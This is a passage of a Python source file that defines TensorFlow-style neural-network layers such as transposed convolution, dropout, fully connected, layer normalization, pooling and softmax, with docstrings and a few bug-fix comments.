    num_outputs,
    kernel_size,
    stride=1,
    padding='SAME',
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer,
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a convolution2d_transpose with an optional batch normalization layer.

  The function creates a variable called `weights`, representing the
  kernel, that is convolved with the input. If `normalizer_fn` is `None`, a
  second variable called 'biases' is added to the result of the operation.

  Args:
    inputs: a tensor of size [batch_size, height, width, channels].
    num_outputs: integer, the number of output filters.
    kernel_size: a list of length 2 holding the [kernel_height, kernel_width]
      of the filters. Can be an int if both values are the same.
    stride: a list of length 2: [stride_height, stride_width].
      Can be an int if both strides are the same. Note that presently
      both strides must have the same value.
    padding: one of 'VALID' or 'SAME'.
    activation_fn: activation function, set to None to skip it and maintain
      a linear activation.
    normalizer_fn: normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collection per variable.
    outputs_collections: collection to add the outputs.
    trainable: whether or not the variables should be trainable or not.
    scope: Optional scope for variable_scope.

  Returns:
    a tensor representing the output of the operation.

  Raises:
    ValueError: if 'kernel_size' is not a list of length 2.
  """
  with variable_scope.variable_scope(
      scope, 'Conv2d_transpose', [inputs], reuse=reuse) as sc:
    dtype = inputs.dtype.base_dtype
    kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
    stride_h, stride_w = utils.two_element_tuple(stride)
    num_filters_in = utils.last_dimension(
        inputs.get_shape(), min_rank=4)
    # conv2d_transpose kernels are laid out as
    # [height, width, output_channels, input_channels].
    weights_shape = [kernel_h, kernel_w, num_outputs, num_filters_in]
    weights_collections = utils.get_variable_collections(
        variables_collections, 'weights')
    weights = variables.model_variable(
        'weights',
        shape=weights_shape,
        dtype=dtype,
        initializer=weights_initializer,
        regularizer=weights_regularizer,
        trainable=trainable,
        collections=weights_collections)

    inputs_shape = array_ops.shape(inputs)
    batch_size = inputs_shape[0]
    height, width = inputs_shape[1], inputs_shape[2]

    def get_deconv_dim(dim_size, stride_size, kernel_size, padding):
      # Computes an output dimension of the transpose convolution; handles
      # static ints, unknown (None) dims and dynamic Tensor dims alike.
      if isinstance(dim_size, ops.Tensor):
        dim_size = math_ops.mul(dim_size, stride_size)
      elif dim_size is not None:
        dim_size *= stride_size
      if padding == 'VALID' and dim_size is not None:
        dim_size += max(kernel_size - stride_size, 0)
      return dim_size

    # Infer the dynamic output shape:
    out_height = get_deconv_dim(height, stride_h, kernel_h, padding)
    out_width = get_deconv_dim(width, stride_w, kernel_w, padding)

    output_shape = array_ops.pack(
        [batch_size, out_height, out_width, num_outputs])
    outputs = nn.conv2d_transpose(inputs, weights, output_shape,
                                  [1, stride_h, stride_w, 1],
                                  padding=padding)

    # Infer the static output shape:
    out_shape = inputs.get_shape().as_list()
    out_shape[-1] = num_outputs
    out_shape[1] = get_deconv_dim(out_shape[1], stride_h, kernel_h, padding)
    out_shape[2] = get_deconv_dim(out_shape[2], stride_w, kernel_w, padding)
    outputs.set_shape(out_shape)

    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      if biases_initializer is not None:
        biases_collections = utils.get_variable_collections(
            variables_collections, 'biases')
        # Fix: pass `trainable` through for biases, matching the weights
        # variable above and the other conv/fc layers in this file.
        biases = variables.model_variable('biases',
                                          shape=[num_outputs,],
                                          dtype=dtype,
                                          initializer=biases_initializer,
                                          regularizer=biases_regularizer,
                                          trainable=trainable,
                                          collections=biases_collections)
        outputs = nn.bias_add(outputs, biases)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def dropout(inputs,
            keep_prob=0.5,
            noise_shape=None,
            is_training=True,
            outputs_collections=None,
            scope=None):
  """Returns a dropout op applied to the input.

  When training, each element is kept with probability `keep_prob` and scaled
  by `1 / keep_prob` so that the expected sum stays constant; dropped elements
  become `0`. When not training the input passes through unchanged.

  Args:
    inputs: the tensor to pass to the nn.dropout op.
    keep_prob: A scalar `Tensor` with the same type as x. The probability
      that each element is kept.
    noise_shape: A 1-D `Tensor` of type `int32`, representing the
      shape for randomly generated keep/drop flags.
    is_training: A bool `Tensor` indicating whether or not the model
      is in training mode. If so, dropout is applied and values scaled.
      Otherwise, inputs is returned.
    outputs_collections: collection to add the outputs.
    scope: Optional scope for name_scope.

  Returns:
    a tensor representing the output of the operation.
  """
  with ops.name_scope(scope, 'Dropout', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)

    def _apply_dropout():
      return nn.dropout(inputs, keep_prob, noise_shape)

    def _pass_through():
      return array_ops.identity(inputs)

    # `is_training` may be a Python bool or a Tensor; smart_cond handles both.
    outputs = utils.smart_cond(is_training, _apply_dropout, _pass_through)
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def flatten(inputs,
            outputs_collections=None,
            scope=None):
  """Flattens the input while maintaining the batch_size.

  Assumes that the first dimension represents the batch.

  Args:
    inputs: a tensor of size [batch_size, ...].
    outputs_collections: collection to add the outputs.
    scope: Optional scope for name_scope.

  Returns:
    a flattened tensor with shape [batch_size, k].

  Raises:
    ValueError: if inputs.shape is wrong.
  """
  with ops.name_scope(scope, 'Flatten', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    shape = inputs.get_shape()
    rank = shape.ndims
    if rank is None or rank < 2:
      raise ValueError('Inputs must have a least 2 dimensions.')
    # All dimensions past the batch dimension must be static so the
    # flattened size can be computed.
    non_batch_dims = shape[1:]
    if not non_batch_dims.is_fully_defined():
      raise ValueError('Inputs 2nd dimension must be defined.')
    flat_dim = non_batch_dims.num_elements()
    outputs = array_ops.reshape(inputs, [-1, flat_dim])
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _sparse_inner_flatten(inputs, new_rank):
  """Helper function for `inner_flatten`."""
  # Keep the leading `new_rank - 1` dims, collapse the rest into one.
  kept_dims = inputs.shape[:new_rank - 1]
  collapsed_dim = math_ops.reduce_prod(inputs.shape[new_rank - 1:])
  target_shape = array_ops.concat(0, (kept_dims, [collapsed_dim]))
  return sparse_ops.sparse_reshape(inputs, target_shape)
def _dense_inner_flatten(inputs, new_rank):
  """Helper function for `inner_flatten`."""
  rank_check = check_ops.assert_rank_at_least(
      inputs, new_rank, message='inputs has rank less than new_rank')
  with ops.control_dependencies([rank_check]):
    kept_dims = array_ops.slice(
        array_ops.shape(inputs), [0], [new_rank - 1])
    reshaped = array_ops.reshape(
        inputs, array_ops.concat(0, (kept_dims, [-1])))

  # With an integer `new_rank` we can try to recover a static shape.
  if isinstance(new_rank, six.integer_types):
    shape = inputs.get_shape()
    if shape is not None and shape.dims is not None:
      dims = shape.as_list()
      outer_dims = dims[:new_rank - 1]
      inner_dims = dims[new_rank - 1:]
      if any(dim is None for dim in inner_dims):
        # Any unknown inner dim makes the flattened size unknown too.
        flat_dim = None
      else:
        flat_dim = 1
        for dim in inner_dims:
          flat_dim *= dim
      reshaped.set_shape(outer_dims + [flat_dim])
  return reshaped
@add_arg_scope
def _inner_flatten(inputs, new_rank, output_collections=None, scope=None):
  """Flattens inner dimensions of `inputs`, returns a Tensor with `new_rank`.

  For example:
  '''
      x = tf.random_uniform(shape=[1, 2, 3, 4, 5, 6])
      y = _inner_flatten(x, 4)
      assert y.get_shape().as_list() == [1, 2, 3, (4 * 5 * 6)]
  '''
  This layer will fail at run time if `new_rank` is greater than the current
  rank of `inputs`.

  Args:
    inputs: a `Tensor` or `SparseTensor`.
    new_rank: the desired rank of the returned `Tensor` or `SparseTensor`.
    output_collections: collection to which the outputs will be added.
    scope: optional scope for `name_scope`.

  Returns:
    A `Tensor` or `SparseTensor` containing the same values as `inputs`, but
    with innermost dimensions flattened to obtain rank `new_rank`.

  Raises:
    TypeError: `inputs` is not a `Tensor` or `SparseTensor`.
  """
  with ops.name_scope(scope, 'InnerFlatten', [inputs, new_rank]) as name:
    # Dispatch on the input kind; dense inputs are materialized as Tensors.
    if isinstance(inputs, ops.SparseTensor):
      flattened = _sparse_inner_flatten(inputs, new_rank)
    else:
      flattened = _dense_inner_flatten(
          ops.convert_to_tensor(inputs), new_rank)
    return utils.collect_named_outputs(output_collections, name, flattened)
@add_arg_scope
def fully_connected(inputs,
                    num_outputs,
                    activation_fn=nn.relu,
                    normalizer_fn=None,
                    normalizer_params=None,
                    weights_initializer=initializers.xavier_initializer(),
                    weights_regularizer=None,
                    biases_initializer=init_ops.zeros_initializer,
                    biases_regularizer=None,
                    reuse=None,
                    variables_collections=None,
                    outputs_collections=None,
                    trainable=True,
                    scope=None):
  """Adds a fully connected layer.

  `fully_connected` creates a variable called `weights`, representing a fully
  connected weight matrix, which is multiplied by the `inputs` to produce a
  `Tensor` of hidden units. If a `normalizer_fn` is provided (such as
  `batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
  None and a `biases_initializer` is provided then a `biases` variable would be
  created and added the hidden units. Finally, if `activation_fn` is not `None`,
  it is applied to the hidden units as well.

  Note: that if `inputs` have a rank greater than 2, then `inputs` is flattened
  prior to the initial matrix multiply by `weights`.

  Args:
    inputs: A tensor of with at least rank 2 and value for the last dimension,
      i.e. `[batch_size, depth]`, `[None, None, None, channels]`.
    num_outputs: Integer or long, the number of output units in the layer.
    activation_fn: activation function, set to None to skip it and maintain
      a linear activation.
    normalizer_fn: normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional list of collections for all the variables or
      a dictionary containing a different list of collections per variable.
    outputs_collections: collection to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for variable_scope.

  Returns:
    the tensor variable representing the result of the series of operations.

  Raises:
    ValueError: if x has rank less than 2 or if its last dimension is not set.
  """
  # Fix: `long` does not exist on Python 3; `six.integer_types` covers
  # int (and long on Python 2). Also actually interpolate the bad value
  # into the message instead of passing it as a spurious second argument.
  if not isinstance(num_outputs, six.integer_types):
    raise ValueError(
        'num_outputs should be int or long, got %s.' % num_outputs)
  with variable_scope.variable_scope(scope, 'fully_connected', [inputs],
                                     reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    dtype = inputs.dtype.base_dtype
    inputs_shape = inputs.get_shape()
    num_input_units = utils.last_dimension(inputs_shape, min_rank=2)

    # Static and dynamic output shapes: same as the input except for the
    # last dimension, which becomes num_outputs.
    static_shape = inputs_shape.as_list()
    static_shape[-1] = num_outputs

    out_shape = array_ops.unpack(array_ops.shape(inputs))
    out_shape[-1] = num_outputs

    weights_shape = [num_input_units, num_outputs]
    weights_collections = utils.get_variable_collections(
        variables_collections, 'weights')
    weights = variables.model_variable('weights',
                                       shape=weights_shape,
                                       dtype=dtype,
                                       initializer=weights_initializer,
                                       regularizer=weights_regularizer,
                                       collections=weights_collections,
                                       trainable=trainable)
    if len(static_shape) > 2:
      # Reshape inputs
      inputs = array_ops.reshape(inputs, [-1, num_input_units])
    outputs = standard_ops.matmul(inputs, weights)
    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      if biases_initializer is not None:
        biases_collections = utils.get_variable_collections(
            variables_collections, 'biases')
        biases = variables.model_variable('biases',
                                          shape=[num_outputs,],
                                          dtype=dtype,
                                          initializer=biases_initializer,
                                          regularizer=biases_regularizer,
                                          collections=biases_collections,
                                          trainable=trainable)
        outputs = nn.bias_add(outputs, biases)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    if len(static_shape) > 2:
      # Reshape back outputs
      outputs = array_ops.reshape(outputs, array_ops.pack(out_shape))
      outputs.set_shape(static_shape)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def layer_norm(inputs,
               center=True,
               scale=True,
               activation_fn=None,
               reuse=None,
               variables_collections=None,
               outputs_collections=None,
               trainable=True,
               scope=None):
  """Adds a Layer Normalization layer from https://arxiv.org/abs/1607.06450.

    "Layer Normalization"
    Jimmy Lei Ba, Jamie Ryan Kiros, Geoffrey E. Hinton

  Can be used as a normalizer function for conv2d and fully_connected.

  Args:
    inputs: a tensor with 2 or more dimensions. The normalization
      occurs over all but the first dimension.
    center: If True, subtract `beta`. If False, `beta` is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    activation_fn: activation function, default set to None to skip it and
      maintain a linear activation.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional collections for the variables.
    outputs_collections: collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for `variable_op_scope`.

  Returns:
    A `Tensor` representing the output of the operation.

  Raises:
    ValueError: if rank or last dimension of `inputs` is undefined.
  """
  with variable_scope.variable_scope(scope, 'LayerNorm', [inputs],
                                     reuse=reuse) as sc:
    inputs = ops.convert_to_tensor(inputs)
    inputs_shape = inputs.get_shape()
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    params_shape = inputs_shape[-1:]
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined last dimension %s.' % (
          inputs.name, params_shape))
    dtype = inputs.dtype.base_dtype
    # Normalize over every dimension except the batch dimension.
    norm_axes = list(range(1, inputs_rank))

    def _norm_param(name, initializer):
      # Creates one of the beta/gamma parameters with its own collections.
      param_collections = utils.get_variable_collections(
          variables_collections, name)
      return variables.model_variable(name,
                                      shape=params_shape,
                                      dtype=dtype,
                                      initializer=initializer,
                                      collections=param_collections,
                                      trainable=trainable)

    beta = _norm_param('beta', init_ops.zeros_initializer) if center else None
    gamma = _norm_param('gamma', init_ops.ones_initializer) if scale else None

    # Moments over the layer activations, then reuse batch_normalization
    # with a tiny epsilon for numerical stability.
    mean, variance = nn.moments(inputs, norm_axes, keep_dims=True)
    outputs = nn.batch_normalization(
        inputs, mean, variance, beta, gamma, 1E-12)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope,
                                       outputs)
@add_arg_scope
def max_pool2d(inputs,
               kernel_size,
               stride=2,
               padding='VALID',
               data_format=DATA_FORMAT_NHWC,
               outputs_collections=None,
               scope=None):
  """Adds a 2D Max Pooling op.

  It is assumed that the pooling is done per image but not in batch or channels.

  Args:
    inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
      `data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
      `data_format` is `NCHW`.
    kernel_size: A list of length 2: [kernel_height, kernel_width] of the
      pooling kernel over which the op is computed. Can be an int if both
      values are the same.
    stride: A list of length 2: [stride_height, stride_width].
      Can be an int if both strides are the same. Note that presently
      both strides must have the same value.
    padding: The padding method, either 'VALID' or 'SAME'.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    outputs_collections: The collections to which the outputs are added.
    scope: Optional scope for name_scope.

  Returns:
    A `Tensor` representing the results of the pooling operation.

  Raises:
    ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: If 'kernel_size' is not a 2-D list
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with ops.name_scope(scope, 'MaxPool2D', [inputs]) as sc:
    inputs = ops.convert_to_tensor(inputs)
    k_h, k_w = utils.two_element_tuple(kernel_size)
    s_h, s_w = utils.two_element_tuple(stride)
    # Arrange kernel/stride according to the layout of the input tensor.
    if data_format == DATA_FORMAT_NHWC:
      ksize, strides = [1, k_h, k_w, 1], [1, s_h, s_w, 1]
    else:
      ksize, strides = [1, 1, k_h, k_w], [1, 1, s_h, s_w]
    outputs = nn.max_pool(inputs,
                          ksize=ksize,
                          strides=strides,
                          padding=padding,
                          data_format=data_format)
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def one_hot_encoding(labels,
                     num_classes,
                     on_value=1.0,
                     off_value=0.0,
                     outputs_collections=None,
                     scope=None):
  """Transform numeric labels into onehot_labels using `tf.one_hot`.

  Args:
    labels: [batch_size] target labels.
    num_classes: total number of classes.
    on_value: A scalar defining the on-value.
    off_value: A scalar defining the off-value.
    outputs_collections: collection to add the outputs.
    scope: Optional scope for name_scope.

  Returns:
    one hot encoding of the labels.
  """
  with ops.name_scope(scope, 'OneHotEncoding', [labels, num_classes]) as sc:
    labels = ops.convert_to_tensor(labels)
    # one_hot wants int64 indices; widen int32 labels.
    if labels.dtype == dtypes.int32:
      labels = standard_ops.to_int64(labels)
    outputs = standard_ops.one_hot(labels, num_classes,
                                   on_value=on_value, off_value=off_value)
    return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _apply_activation(y, activation_fn, output_collections):
  """Applies `activation_fn` to `y` and records the result in collections."""
  if activation_fn is not None:
    y = activation_fn(y)
  # Always record activations in ACTIVATIONS plus any caller collections.
  collections = list(output_collections or []) + [ops.GraphKeys.ACTIVATIONS]
  ops.add_to_collections(collections, y)
  return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
  """Applies the same layer with the same arguments repeatedly.

  ```python
    y = repeat(x, 3, conv2d, 64, [3, 3], scope='conv1')
    # It is equivalent to:

    x = conv2d(x, 64, [3, 3], scope='conv1/conv1_1')
    x = conv2d(x, 64, [3, 3], scope='conv1/conv1_2')
    y = conv2d(x, 64, [3, 3], scope='conv1/conv1_3')
  ```

  If the `scope` argument is not given in `kwargs`, it is set to
  `layer.__name__`, or `layer.func.__name__` (for `functools.partial`
  objects). If neither `__name__` nor `func.__name__` is available, the
  layers are called with `scope='repeat'`.

  Args:
    inputs: A `Tensor` suitable for layer.
    repetitions: Int, number of repetitions.
    layer: A layer with arguments `(inputs, *args, **kwargs)`
    *args: Extra args for the layer.
    **kwargs: Extra kwargs for the layer.

  Returns:
    a tensor result of applying the layer, repetitions times.
  Raises:
    ValueError: if the op is unknown or wrong.
  """
  scope = kwargs.pop('scope', None)
  with variable_scope.variable_scope(scope, 'Repeat', [inputs]):
    inputs = ops.convert_to_tensor(inputs)
    if scope is None:
      # Derive a per-layer scope name from the callable when possible.
      if hasattr(layer, '__name__'):
        scope = layer.__name__
      elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
        scope = layer.func.__name__  # In case layer is a functools.partial.
      else:
        scope = 'repeat'
    outputs = inputs
    for i in range(repetitions):
      kwargs['scope'] = scope + '_' + str(i+1)
      outputs = layer(outputs, *args, **kwargs)
    return outputs
@add_arg_scope
def separable_convolution2d(
    inputs,
    num_outputs,
    kernel_size,
    depth_multiplier,
    stride=1,
    padding='SAME',
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer,
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a depth-separable 2D convolution with optional batch_norm layer.

  This op first performs a depthwise convolution that acts separately on
  channels, creating a variable called `depthwise_weights`. If `num_outputs`
  is not None, it adds a pointwise convolution that mixes channels, creating a
  variable called `pointwise_weights`. Then, if `batch_norm_params` is None,
  it adds bias to the result, creating a variable called 'biases', otherwise
  it adds a batch normalization layer. It finally applies an activation function
  to produce the end result.

  Args:
    inputs: a tensor of size [batch_size, height, width, channels].
    num_outputs: the number of pointwise convolution output filters. If is
      None, then we skip the pointwise convolution stage.
    kernel_size: a list of length 2: [kernel_height, kernel_width] of
      of the filters. Can be an int if both values are the same.
    depth_multiplier: the number of depthwise convolution output channels for
      each input channel. The total number of depthwise convolution output
      channels will be equal to `num_filters_in * depth_multiplier`.
    stride: a list of length 2: [stride_height, stride_width], specifying the
      depthwise convolution stride. Can be an int if both strides are the same.
    padding: one of 'VALID' or 'SAME'.
    activation_fn: activation function, set to None to skip it and maintain
      a linear activation.
    normalizer_fn: normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      default set to None for no normalizer function
    normalizer_params: normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collection per variable.
    outputs_collections: collection to add the outputs.
    trainable: whether or not the variables should be trainable or not.
    scope: Optional scope for variable_scope.

  Returns:
    A `Tensor` representing the output of the operation.
  """
  with variable_scope.variable_scope(
      scope, 'SeparableConv2d', [inputs], reuse=reuse) as sc:
    dtype = inputs.dtype.base_dtype
    kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
    stride_h, stride_w = utils.two_element_tuple(stride)
    num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
    weights_collections = utils.get_variable_collections(
        variables_collections, 'weights')

    depthwise_shape = [kernel_h, kernel_w,
                       num_filters_in, depth_multiplier]
    depthwise_weights = variables.model_variable(
        'depthwise_weights',
        shape=depthwise_shape,
        dtype=dtype,
        initializer=weights_initializer,
        regularizer=weights_regularizer,
        trainable=trainable,
        collections=weights_collections)
    strides = [1, stride_h, stride_w, 1]
    if num_outputs is not None:
      # Full separable convolution: Depthwise followed by pointwise convolution.
      pointwise_shape = [1, 1, depth_multiplier * num_filters_in,
                         num_outputs]
      pointwise_weights = variables.model_variable(
          'pointwise_weights',
          shape=pointwise_shape,
          dtype=dtype,
          initializer=weights_initializer,
          regularizer=weights_regularizer,
          trainable=trainable,
          collections=weights_collections)
      outputs = nn.separable_conv2d(inputs,
                                    depthwise_weights,
                                    pointwise_weights,
                                    strides,
                                    padding)
    else:
      # Depthwise convolution only.
      outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding)
      num_outputs = depth_multiplier * num_filters_in

    if normalizer_fn is not None:
      normalizer_params = normalizer_params or {}
      outputs = normalizer_fn(outputs, **normalizer_params)
    else:
      if biases_initializer is not None:
        biases_collections = utils.get_variable_collections(
            variables_collections, 'biases')
        # Fix: pass `trainable` through for biases, matching the weight
        # variables above and the other layers in this file.
        biases = variables.model_variable('biases',
                                          shape=[num_outputs,],
                                          dtype=dtype,
                                          initializer=biases_initializer,
                                          regularizer=biases_regularizer,
                                          trainable=trainable,
                                          collections=biases_collections)
        outputs = nn.bias_add(outputs, biases)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def softmax(logits, scope=None):
  """Performs softmax on Nth dimension of N-dimensional logit tensor.

  For two-dimensional logits this reduces to tf.nn.softmax. The N-th dimension
  needs to have a specified number of elements (number of classes).

  Args:
    logits: N-dimensional `Tensor` with logits, where N > 1.
    scope: Optional scope for variable_scope.

  Returns:
    a `Tensor` with same shape and type as logits.
  """
  # TODO(jrru): Add axis argument which defaults to last dimension.
  with variable_scope.variable_scope(scope, 'softmax', [logits]):
    num_classes = utils.last_dimension(logits.get_shape(), min_rank=2)
    # Collapse to 2-D, softmax over the class axis, then restore the shape.
    flat_logits = array_ops.reshape(logits, [-1, num_classes])
    flat_predictions = nn.softmax(flat_logits)
    predictions = array_ops.reshape(flat_predictions,
                                    array_ops.shape(logits))
    predictions.set_shape(logits.get_shape())
    return predictions
def stack(inputs, layer, stack_args, **kwargs):
  """Builds a stack of layers by applying layer repeatedly using stack_args.

  `stack` allows you to repeatedly apply the same operation with different
  arguments `stack_args[i]`. For each application of the layer, `stack` creates
  a new scope appended with an increasing number. For example:

  ```python
    y = stack(x, fully_connected, [32, 64, 128], scope='fc')
    # It is equivalent to:

    x = fully_connected(x, 32, scope='fc/fc_1')
    x = fully_connected(x, 64, scope='fc/fc_2')
    y = fully_connected(x, 128, scope='fc/fc_3')
  ```

  If the `scope` argument is not given in `kwargs`, it is set to
  `layer.__name__`, or `layer.func.__name__` (for `functools.partial`
  objects). If neither `__name__` nor `func.__name__` is available, the
  layers are called with `scope='stack'`.

  Args:
    inputs: A `Tensor` suitable for layer.
    layer: A layer with arguments `(inputs, *args, **kwargs)`
    stack_args: A list/tuple of parameters for each call of layer.
    **kwargs: Extra kwargs for the layer.

  Returns:
    a `Tensor` result of applying the stacked layers.

  Raises:
    ValueError: if the op is unknown or wrong.
  """
  scope = kwargs.pop('scope', None)
  if not isinstance(stack_args, (list, tuple)):
    raise ValueError('stack_args need to be a list or tuple')
  with variable_scope.variable_scope(scope, 'Stack', [inputs]):
    outputs = ops.convert_to_tensor(inputs)
    if scope is None:
      # Derive a per-layer scope name from the callable when possible.
      if hasattr(layer, '__name__'):
        scope = layer.__name__
      elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
        scope = layer.func.__name__  # In case layer is a functools.partial.
      else:
        scope = 'stack'
    for i, layer_args in enumerate(stack_args):
      if not isinstance(layer_args, (list, tuple)):
        layer_args = [layer_args]
      kwargs['scope'] = '%s_%d' % (scope, i + 1)
      outputs = layer(outputs, *layer_args, **kwargs)
    return outputs
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
  """Normalizes the given input across the specified dimension to unit length.

  Note that the rank of `input` must be known.

  Args:
    inputs: A `Tensor` of arbitrary size.
    dim: The dimension along which the input is normalized.
    epsilon: A small value added to the squared norm to avoid division by
      zero for all-zero slices.
    scope: Optional scope for variable_scope.

  Returns:
    The normalized `Tensor`.

  Raises:
    ValueError: If the rank of `inputs` is unknown, or if `dim` is not in
      the range `[0, rank)`.
  """
  with variable_scope.variable_scope(scope, 'UnitNorm', [inputs]):
    if not inputs.get_shape():
      raise ValueError('The input rank must be known.')
    input_rank = len(inputs.get_shape().as_list())
    # `dim == 0` is valid, so the requirement is non-negative, not positive.
    if dim < 0 or dim >= input_rank:
      raise ValueError(
          'dim must be non-negative but smaller than the input rank.')

    lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
        math_ops.square(inputs), dim, True))
    # Tile the kept-dims `lengths` back to the full input shape: ones for
    # every dimension except `dim`, whose (dynamic) size is recovered.
    multiples = []
    if dim > 0:
      multiples.append(array_ops.ones([dim], dtypes.int32))
    multiples.append(array_ops.slice(array_ops.shape(inputs), [dim], [1]))
    if dim < (input_rank - 1):
      multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
    multiples = array_ops.concat(0, multiples)
    return math_ops.div(inputs, array_ops.tile(lengths, multiples))
def legacy_fully_connected(x,
                           num_output_units,
                           activation_fn=None,
                           weight_init=initializers.xavier_initializer(),
                           bias_init=init_ops.zeros_initializer,
                           name=None,
                           weight_collections=(ops.GraphKeys.WEIGHTS,),
                           bias_collections=(ops.GraphKeys.BIASES,),
                           output_collections=(ops.GraphKeys.ACTIVATIONS,),
                           trainable=True,
                           weight_regularizer=None,
                           bias_regularizer=None):
  # pylint: disable=anomalous-backslash-in-string
  r"""Adds the parameters for a fully connected layer and returns the output.

  A fully connected layer is generally defined as a matrix multiply:
  `y = f(w * x + b)` where `f` is given by `activation_fn`. If
  `activation_fn` is `None`, the result of `y = w * x + b` is
  returned.

  If `x` has shape [\\\(\\text{dim}_0, \\text{dim}_1, ..., \\text{dim}_n\\\)]
  with more than 2 dimensions (\\\(n > 1\\\)), then we repeat the matrix
  multiply along the first dimensions. The result r is a tensor of shape
  [\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`],
  where \\\( r_{i_0, ..., i_{n-1}, k} =
  \\sum_{0 \\leq j < \\text{dim}_n} x_{i_0, ... i_{n-1}, j} \cdot w_{j, k}\\\).
  This is accomplished by reshaping `x` to 2-D
  [\\\(\\text{dim}_0 \\cdot ... \\cdot \\text{dim}_{n-1}, \\text{dim}_n\\\)]
  before the matrix multiply and afterwards reshaping it to
  [\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`].

  This op creates `w` and optionally `b`. Bias (`b`) can be disabled by setting
  `bias_init` to `None`.

  The variable creation is compatible with `tf.variable_scope` and so can be
  reused with `tf.variable_scope` or `tf.make_template`.

  Most of the details of variable creation can be controlled by specifying the
  initializers (`weight_init` and `bias_init`) and in which collections to place
  the created variables (`weight_collections` and `bias_collections`; note that
  the variables are always added to the `VARIABLES` collection). The output of
  the layer can be placed in custom collections using `output_collections`.
  The collections arguments default to `WEIGHTS`, `BIASES` and `ACTIVATIONS`,
  respectively.

  A per layer regularization can be specified by setting `weight_regularizer`
  and `bias_regularizer`, which are applied to the weights and biases
